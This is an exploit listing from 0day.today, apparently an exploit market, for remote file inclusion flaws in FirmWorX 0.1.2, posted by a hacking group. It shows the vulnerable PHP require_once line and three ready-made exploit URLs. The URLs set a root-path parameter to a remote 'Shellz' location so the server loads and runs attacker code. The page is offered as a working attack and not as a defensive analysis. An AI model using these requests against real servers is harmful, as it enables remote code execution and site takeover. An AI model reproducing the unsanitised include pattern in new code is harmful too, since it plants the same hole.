[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FirmWorX 0.1.2 Multiple Remote File Inclusion Vulnerabilities

Author
DeltahackingTEAM
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1906
Category
web applications
Date add
23-05-2007
Platform
unsorted
=============================================================
FirmWorX 0.1.2 Multiple Remote File Inclusion Vulnerabilities
=============================================================




**********************************************************************************************************
                                              DeltaSecurityTEAM
                                              WwW.DeltaSecurity.iR
**********************************************************************************************************

* Portal Name = FirmWorX 0.1.2

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://firmworx.sourceforge.net

* Discoverd By = DeltahackingTEAM

--------------------------------------------------------------------------------------------

Vulnerability C0de :


require_once($fm_data['root']."/includes/config/db.inc.php");

--------------------------------------------------------------------------------------------

- Expl0it:

http://localhost/[PATH]/includes/config/master.inc.php?fm_data[root]=Shellz?
http://localhost/[PATH]/includes/functions/master.inc.php?fm_data[root]=Shellz?
http://localhost/[PATH]/modules/bank/includes/design/main.inc.php?bank_data[root]=Shellz?

--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , And all I

**********************************************************************************************************



#  0day.today [2024-12-25]  #